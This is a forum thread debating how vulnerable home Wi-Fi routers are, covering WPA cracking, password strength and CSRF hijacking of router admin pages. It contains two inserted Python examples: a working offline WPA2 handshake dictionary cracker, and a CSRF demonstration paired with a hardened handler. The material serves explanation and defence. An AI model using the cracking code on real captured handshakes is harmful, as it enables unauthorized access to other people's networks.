Home Wi-Fi Routers Are Easily Hackable

Anyone who does pentesting isn't surprised or even interested in this. A few long nights of research and a little know-how with Linux, and the wireless world is yours for the taking, if you're patient enough.
 

WPA hasn't been cracked. Very few people use WEP anymore.
 


That is not entirely true. There have been tools out to crack WPA for quite some time now (especially if using TKIP as opposed to AES). A badly configured router using WPA can be cracked in as little as ten minutes (usually much longer, but still). Also, a surprisingly large number of home users still use WEP; this should not be the case, but most people don't know the difference and just go with whatever their router defaults to.
 

Yeah, I'm aware of WPA1 being vulnerable if using TKIP, but when it comes to WPA AES or WPA2 there's nothing. I just don't think someone with pentesting and "Linux experience" has the "wireless world for the taking" as he put it.
 
And some of the authenticated attacks were simple CSRF attacks, which should absolutely be fixed. Or even simpler CSRF-type vulnerabilities, like me knowing your router is 192.168.1.1 and sending you a link that goes to http://192.168.1.1/admin/delete_your_whole_face?lol, or to a page with a button that does that, and it deletes your entire face because you had an active router session in another tab.

That isn't a problem with the routers, though; it's a problem with the user clicking the malicious link and the browser allowing cross-site requests.
 
Yeah, I'm aware of WPA1 being vulnerable if using TKIP, but when it comes to WPA AES or WPA2 there's nothing. I just don't think someone with pentesting and "Linux experience" has the "wireless world for the taking" as he put it.

You would be surprised ;). Though yes, as you say, much of it does depend on the user simply not using bad settings, but even a misconfigured WPA2 can be "hacked." And of course if you use a bad key or poor password, no security measure is going to help you ;).
 
My Netgear router also has so many other issues that I decided to install OpenWrt this weekend. I'm not even sure if WPS is disabled. The checkbox is gone, but the button is still illuminated. I also would like to use my printer on the USB port like on my old ZyXEL router, instead of just storage media. I hope this can be fixed by software.
 
Not on the list??? Your router just wasn't tested.

lol, yep. It's like people saying "I don't have a virus because I don't run AV and I don't feel anything." All the routers are made by a handful of companies, and you know they reuse code on all of them as much as they can.
 
I still see some DD-WRT stuff running root/admin passwords....

I use pfSense now. Password would be a bit difficult to guess. I'm sure with enough brute force, though, it could be done. Just like most other passwords.

I do plan on going with a Cisco router sometime, though. I'm already running a nice Cisco Gb switch (3560E) and need a good router to go with it.
 

No password should be easily guessable these days, especially a network pass. Mine is over 25 characters long and a mix of numbers, letters, and symbols. Just pick a quote or a line from a poem, mix in some 1337, and you're good to go. Long-ass complicated password, and it's real easy to remember. Brute-force proof.
 

Nothing is completely safe. Sure, it may take a long time (especially when you lock it out after x attempts), but it's not impossible.

Mine is something like this: Mg5#2mcT (not even close to what it is, but you get the idea). So, I guess I could write a simple script to start guessing, but it'd still take a while. If they want into my network that bad, go for it. There is really nothing that is that special, anyway. If you want a copy of my porn folder, give me a 500 GB HDD and I'll copy it for you.

I guess if I had mission critical stuff, I'd secure it a bit more, but for a home user with very little stuff on my network (sure, taxes and stuff, but that's nothing huge), I'm fine.
 

So basically it's an ~8-character password with random letters/numbers/symbols, i.e. it's short and hard to memorize. Really, the most secure thing about it is the fact that it has a password in the first place and it blends in with other networks, i.e. security by obscurity. But it must be annoying to have to write it down, so here, let me do you a favor.

Ur_Mom's_New_Passw0rd_Ownz!

There you go, much more secure and easy to remember :p
 

That would be a very secure password. But, I've memorized the other one. Never wrote it down. After you type it in a few times, you memorize it. That's just for the router, though. I have other passwords for other things, depending on the security I need. If it's for some web site with nothing interesting, it's a simple password. If it's something that needs more protection, it's a better password.

My work password, though, is similar to what you said. A phrase with some extra characters. Although, to be honest, it isn't that great. Every 90 days we change passwords. So, the number within my password is incremented rather than a whole new password. It's not the best way to do it, but otherwise I'd write it down....
 
So, the number within my password is incremented rather than a whole new password. It's not the best way to do it, but otherwise I'd write it down....

That's not a bad idea; it keeps the original easy-to-remember phrase intact, maintains a long password length, and fulfills the "change your password" requirement.
 
http://www.ubnt.com/unifi

It's not a router but an access point, but given they are testing the wireless, this is probably more relevant than the actual router (pfSense in my case).

I've got that same combination:

1.) pfSense as a router and firewall on my ESXi box

2.) Unifi LR Wireless AP

Tied together using an HP ProCurve 1810G-24 managed layer-2 switch.

Now, anything is hackable if someone has sufficient talent, time and determination, I'm just thinking my setup makes it easier for some random attacker to go for the neighbors instead :p
 
If what I saw on the Linksys page with the proof of concept is correct, they have to do this:



So if you don't go browsing on web pages that are designed to hack your router, there is no worry :).

How do I know which web page on the WWW is designed to hack your router? Every link sent to you by email which you have no clue about but sounds like it is legit :) And yes, that goes for links through any IM as well ;). Those have been known to do the same thing, even if it is a close friend sending you such a link.

Hahaha, that is quite a specific situation there. How often does one leave the admin page for their router open and go on random websites? The issue is not that the router has an exploit, but that the browser has an exploit allowing web pages to tell it to execute code on another page. I'm sure this same exploit could also be used to make transactions on your bank if you have your bank's site open and go to such a site that is designed for that specific bank. It's time for browser makers to stop screwing around and actually make them secure. Browsers should not be able to execute arbitrary code or interact with other web pages that are open in it.

So is this article pretty much silliness like that, then? I figured it was real hacking, like being able to send a specific packet to the router, or that there was some kind of back door that then enabled someone to gain full access.
 
I do plan on going with a Cisco router sometime, though. I'm already running a nice Cisco Gb switch (3560E) and need a good router to go with it.

http://tools.cisco.com/security/center/content/CiscoSecurityResponse/cisco-sr-20130318-type4

http://www.csoonline.com/article/73...ssword-encryption-in-its-ios-operating-system

Even Cisco does stupid things sometimes. Cliffs: a flaw they introduced in a new encryption algorithm makes that version susceptible to brute-force attacks. They considered it a non-issue until customers started to complain.
 
From what I can tell, this article is stupid. Just like others have mentioned, the perp needs my login info, which in my case is not the default login/password. I changed that minutes after setting it up.

If you bothered to READ the article, it says it's done by creating a hacked web page or email that hijacks the credentials from your browser or session. You never enter them; it is stealthy, and then it opens up whatever it wants and you have no idea.
 
Yeah, I'm aware of WPA1 being vulnerable if using TKIP, but when it comes to WPA AES or WPA2 there's nothing. I just don't think someone with pentesting and "Linux experience" has the "wireless world for the taking" as he put it.

It's vulnerable. If someone wants in and has the time, they can break in. Knowing a tiny bit about the password or what the login contains can vastly reduce the time.

For instance, most WPA2 ISP modems/routers are crackable within a few hours.

If you have the right equipment, you overpower the device with a stronger radio, capture a handshake and brute-force that.
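What "capture a handshake and brute-force that" means in practice, and why the password-length posts earlier in the thread matter: WPA2-PSK derives the PMK from the passphrase and SSID with PBKDF2-HMAC-SHA1 (4096 iterations), derives the PTK from the PMK plus the two MAC addresses and two nonces exchanged in the 4-way handshake, and authenticates the handshake frames with a MIC keyed by the first 16 bytes of the PTK. Anyone holding a capture of message 2 can recompute that MIC offline for each candidate passphrase and compare. The Python below is an added example, not code from the thread or from any tool mentioned in it; the SSID, MAC addresses, nonces, EAPOL frame and "victim" passphrase are all constructed here so that the sample capture can be built inline. The cost helper at the end is a plain keyspace estimate.

```python
import hashlib
import hmac

# Everything below is a constructed sample for this example. In a real attack the
# MACs, nonces, EAPOL frame and MIC are read from a captured 4-way handshake.
SSID = b"HomeNet"                                   # assumed network name
AP_MAC = bytes.fromhex("001122334455")              # authenticator address (made up)
STA_MAC = bytes.fromhex("66778899aabb")             # supplicant address (made up)
ANONCE = hashlib.sha256(b"anonce-demo").digest()    # 32-byte nonce stand-in
SNONCE = hashlib.sha256(b"snonce-demo").digest()    # 32-byte nonce stand-in
TRUE_PASSPHRASE = "correct horse"                   # victim's PSK, used only to build the sample capture

# Message 2 of the handshake with its 16-byte MIC field zeroed, which is how the MIC is computed.
EAPOL_MSG2_ZEROED_MIC = (
    bytes.fromhex("0103005f")            # EAPOL: version 1, type 3 (Key), body length 95
    + bytes.fromhex("02")                # descriptor type: RSN (WPA2) key
    + bytes.fromhex("010a")              # key info: MIC set, pairwise, descriptor version 2
    + bytes.fromhex("0010")              # key length 16
    + bytes.fromhex("0000000000000001")  # replay counter
    + SNONCE                             # key nonce (the client's SNonce)
    + bytes(16) + bytes(8) + bytes(8)    # key IV, RSC, key ID
    + bytes(16)                          # MIC field, zeroed
    + bytes.fromhex("0000")              # key data length (a real frame carries the RSN IE here)
)


def pmk_from_passphrase(passphrase: str, ssid: bytes) -> bytes:
    """WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    This is the dominant cost of one guess, and it depends only on the SSID, not the handshake."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid, 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """IEEE 802.11 PRF-512: concatenate HMAC-SHA1(key, label || 0x00 || data || i) for i = 0..3."""
    return b"".join(
        hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest() for i in range(4)
    )[:64]


def derive_kck(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF-512(PMK, "Pairwise key expansion", min(AA,SPA) || max(AA,SPA) || min(nonces) || max(nonces)).
    Its first 16 bytes are the KCK, the key that authenticates the EAPOL-Key frames."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf_512(pmk, b"Pairwise key expansion", data)[:16]


def eapol_mic(kck: bytes, frame_with_zeroed_mic: bytes) -> bytes:
    """Descriptor version 2 (WPA2/CCMP): MIC = HMAC-SHA1(KCK, frame)[:16].
    Legacy WPA/TKIP (version 1) uses HMAC-MD5 instead."""
    return hmac.new(kck, frame_with_zeroed_mic, hashlib.sha1).digest()[:16]


def crack_psk(candidates, ssid, aa, spa, anonce, snonce, frame, captured_mic):
    """Offline dictionary attack: recompute the MIC for each candidate passphrase and compare
    it to the captured one. No further contact with the access point is needed."""
    for passphrase in candidates:
        kck = derive_kck(pmk_from_passphrase(passphrase, ssid), aa, spa, anonce, snonce)
        if hmac.compare_digest(eapol_mic(kck, frame), captured_mic):
            return passphrase
    return None


def build_sample_capture() -> bytes:
    """Stand-in for the MIC field read out of the captured message 2 (constructed here)."""
    kck = derive_kck(pmk_from_passphrase(TRUE_PASSPHRASE, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)
    return eapol_mic(kck, EAPOL_MSG2_ZEROED_MIC)


def seconds_to_exhaust(alphabet_size: int, length: int, guesses_per_second: float) -> float:
    """Worst-case time to try every passphrase of a given shape at a given offline guess rate."""
    return alphabet_size ** length / guesses_per_second


if __name__ == "__main__":
    wordlist = ["password", "12345678", "letmein123", "Mg5#2mcT", "correct horse"]
    print("recovered PSK:", crack_psk(wordlist, SSID, AP_MAC, STA_MAC, ANONCE, SNONCE,
                                      EAPOL_MSG2_ZEROED_MIC, build_sample_capture()))
    # 8 random printable characters vs a 25-character phrase, at a million guesses per second
    for alphabet, length in ((94, 8), (94, 25)):
        years = seconds_to_exhaust(alphabet, length, 1e6) / 3.15e7
        print(f"{length} chars from {alphabet}: {years:.3g} years to exhaust")
```

The point the thread circles around falls out of the code: the attacker only needs to be in radio range long enough to record one handshake (or to provoke one by deauthenticating a client), and from then on the only thing standing between them and the PSK is how many PBKDF2 evaluations the passphrase forces them to make. Knowing the SSID in advance also lets the PMK table be precomputed for common network names.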
 
http://tools.cisco.com/security/center/content/CiscoSecurityResponse/cisco-sr-20130318-type4

http://www.csoonline.com/article/73...ssword-encryption-in-its-ios-operating-system

Even Cisco does stupid things sometimes. Cliffs: a flaw they introduced in a new encryption algorithm makes that version susceptible to brute-force attacks. They considered it a non-issue until customers started to complain.

Almost everything Cisco does is unnecessarily complicated. It's security through obscurity and obfuscation.
 
It's vulnerable. If someone wants in and has the time, they can break in. Knowing a tiny bit about the password or what the login contains can vastly reduce the time.

For instance, most WPA2 ISP modems/routers are crackable within a few hours.

If you have the right equipment, you overpower the device with a stronger radio, capture a handshake and brute-force that.

Why would you need to "overpower the device with a stronger radio"? That doesn't even make sense and leads me to believe you're speaking BS.
 
Means he wants to overpower you by turning the volume up on his radio and brute-force a handshake out of you, lol. :p
 
here's the list...

routers.jpg
 
I have a feeling that people don't understand what the issue is here. No, hackers don't need to know the password. Changing the password or making it complicated won't prevent router hijacking.

Authenticated attack means that the victim has a live session to the router's management screen open. Fake links from another browser tab can invoke commands to the router's management tab.

Unauthenticated attack means that the victim does not have a live session to the router's management screen open. Fake links on a web page can invoke commands directly to the router.

Trivial attack means that no human interaction is needed.

All these attacks are capable of changing the password of the router, or gaining control of the router without the need of the existing password.

Remote Adversary means that the router allows Remote Management Off. Local Adversary means Remote Management On or attackers have access to computers within the network.

In simple terms, all you need to do is click an ad link on tab 1 just to see what kinds of deals you may get and Bam, your router got hijacked and you didn't even know it. That is what the problem is.
 

No problem...lol...all one has to do is update their browser, then all is right with the world again.
 

There is very little having an updated browser can do to limit malicious links. Yes, certain browsers are sandboxed, have their own Java implementations, etc., etc., but at the end of the day, a malicious link can still be created.

This is why it is so VERY important to run with UAC turned on, and not run your user account as admin (maintain a separate admin account for local machine admin, and keep your primary user account limited). At least then you have a chance of protecting your local computer, as you know not to input a password, if you didn't specifically request making a change.

Links like these are the most common forms of successful exploits, because they work. No firewall will prevent them, as they are a request from inside the LAN, and even seasoned internet/tech veterans are often fooled by realistic-looking web pages and links.

One might argue that randomly clicking a link designed to take over your specific router, just when you have an authenticated session to it open, may be a bit of a stretch, but think about it.

Make an instructional website: "How to enable UPnP to make your Xbox games work on router XX." Instruct them to log in and bring up some arbitrary screen on the router, then "follow this link to the next page", and BAM!
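The mechanism behind the "authenticated attack" explained a few posts up, the 192.168.1.1 link example earlier in the thread, and the instructional-website trick just above is cross-site request forgery: the browser attaches the router's session cookie to any request that a page on another site triggers, whether by a link, an image tag or an auto-submitted form, so the router cannot tell the attacker's request from the admin's. The Python below is an added example, not code from the thread or from any router's firmware. It models a DNS-change handler the way a vulnerable router implements it (the cookie is the only check) next to a hardened version (POST only, Origin/Referer must be the router itself, and the request must carry a per-session token that a page on another origin cannot read). The router address is the one used in the thread; the evil.example site, the handler names and the session layout are assumptions made for the example.

```python
import hmac
import secrets
from dataclasses import dataclass, field
from urllib.parse import urlparse

ROUTER_ORIGIN = "http://192.168.1.1"   # router address used as the example in the thread


@dataclass
class Request:
    """The parts of an HTTP request the handlers look at. Cookies and headers are whatever
    the browser attached, which is the crux of CSRF."""
    method: str
    path: str
    cookies: dict
    params: dict
    headers: dict = field(default_factory=dict)


def same_origin(url: str, expected: str) -> bool:
    """True when url has the same scheme, host and port as expected (browser origin rules)."""
    if not url:
        return False
    a, b = urlparse(url), urlparse(expected)
    return (a.scheme, a.hostname, a.port) == (b.scheme, b.hostname, b.port)


@dataclass
class Router:
    sessions: dict = field(default_factory=dict)                    # session id -> per-session CSRF token
    dns_servers: list = field(default_factory=lambda: ["192.168.1.1"])

    def login(self) -> tuple:
        """The victim logs in from the admin tab; the browser keeps the session cookie."""
        sid = secrets.token_urlsafe(16)
        self.sessions[sid] = secrets.token_urlsafe(32)
        return sid, self.sessions[sid]

    def vulnerable_set_dns(self, req: Request) -> int:
        """The authenticated attack surface described in the thread: the only check is the
        session cookie, which the browser sends on a request triggered from any other site."""
        if req.cookies.get("sid") not in self.sessions:
            return 401
        self.dns_servers = [req.params["dns"]]
        return 200

    def hardened_set_dns(self, req: Request) -> int:
        """Same function with CSRF defences: state changes only via POST, the Origin (or Referer)
        must be the router itself, and the request must carry the per-session token, which a page
        on another origin has no way to read."""
        sid = req.cookies.get("sid")
        if sid not in self.sessions:
            return 401
        if req.method != "POST":
            return 405
        if not same_origin(req.headers.get("Origin") or req.headers.get("Referer", ""), ROUTER_ORIGIN):
            return 403
        if not hmac.compare_digest(req.params.get("csrf", ""), self.sessions[sid]):
            return 403
        self.dns_servers = [req.params["dns"]]
        return 200


def cross_site_request(sid: str) -> Request:
    """What the victim's browser sends when a page on evil.example (made-up attacker site)
    auto-submits a hidden form at the router: the router cookie is attached, the attacker's
    origin is in the headers, and there is no token because the attacker never saw one."""
    return Request("POST", "/set_dns", {"sid": sid}, {"dns": "6.6.6.6"},
                   {"Origin": "http://evil.example", "Referer": "http://evil.example/deals"})


def run_demo() -> dict:
    """Returns {handler: (status, resulting DNS server)} for the cross-site request against each
    handler, plus a legitimate change submitted from the admin page itself."""
    results = {}
    for name in ("vulnerable_set_dns", "hardened_set_dns"):
        router = Router()
        sid, _token = router.login()                     # victim has an admin session open
        status = getattr(router, name)(cross_site_request(sid))
        results[name] = (status, router.dns_servers[0])
    router = Router()
    sid, token = router.login()
    legit = Request("POST", "/set_dns", {"sid": sid}, {"dns": "9.9.9.9", "csrf": token},
                    {"Origin": ROUTER_ORIGIN})
    results["legitimate"] = (router.hardened_set_dns(legit), router.dns_servers[0])
    return results


if __name__ == "__main__":
    for handler, (status, dns) in run_demo().items():
        print(f"{handler:20s} -> HTTP {status}, DNS is now {dns}")
```

Which side of the "router bug or browser bug" argument in this thread you take, the fix is the same: the router's web UI must not treat the presence of a cookie as proof that the admin intended the request. Marking the session cookie `SameSite=Lax` or `Strict` is a useful browser-side complement, but it only helps in browsers that honour the attribute, so the token and Origin checks stay.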
 
Home Wi-Fi routers easily hacked; is anyone really surprised at this? They are designed for ease of use, not security.
 
What's more worrisome is that this is even possible through a browser. It has nothing to do with the routers but the browser itself. If executing such code is possible, then nothing stops a malicious site's code writer from doing something that will make transactions if you happen to have a tab open with your online banking, for example. Browser makers really need to secure their shit. It's insane how full of security holes browsers are now.
 